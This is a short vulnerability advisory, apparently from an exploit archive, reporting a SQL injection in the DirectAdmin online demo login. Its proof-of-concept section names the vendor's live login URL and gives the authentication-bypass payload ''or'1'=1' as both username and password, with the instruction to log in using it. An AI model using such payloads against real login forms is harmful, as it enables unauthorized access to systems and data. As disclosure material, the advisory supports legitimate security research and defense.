DirectAdmin On-Line Demo SQL Injection

2013.02.14

Credit: Juan Carlos Garcia

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-89

++++++++++++++++++++++++++++++++++++++
# Exploit Title :DirectAdmin On-Line Demo SQLInjection
# *Vendor*:http://www.directadmin.com/
# Author: Juan Carlos Garca # Blog: http://hackingmadrid.blogspot.com
# Facebook https://www.facebook.com/pages/Tiger-Team/606699939344001?ref=hl
DESCRIPTION
+++++++++++
DirectAdmin is a graphical web-based web hosting control panel designed to make administration of websites easier.
DirectAdmin is compatible with several versions of Red Hat, Fedora Core, Red Hat Enterprise Linux, CentOS, FreeBSD, Ubuntu and Debian.
PoC
++++
https://www.directadmin.com:2222/CMD_LOGIN
user:user_demo
pass:demo
OR
user1: 'or'1'=1
pass1: 'or'1'=1
Procedure:Login using user1/pass1
++++++++++++++++++++++++
Tiger Team Security Nightsec
++++++++++++++++++++++++

References:

http://www.directadmin.com/

https://www.facebook.com/pages/Tiger-Team/606699939344001?ref=hl

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

DirectAdmin On-Line Demo SQL Injection

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.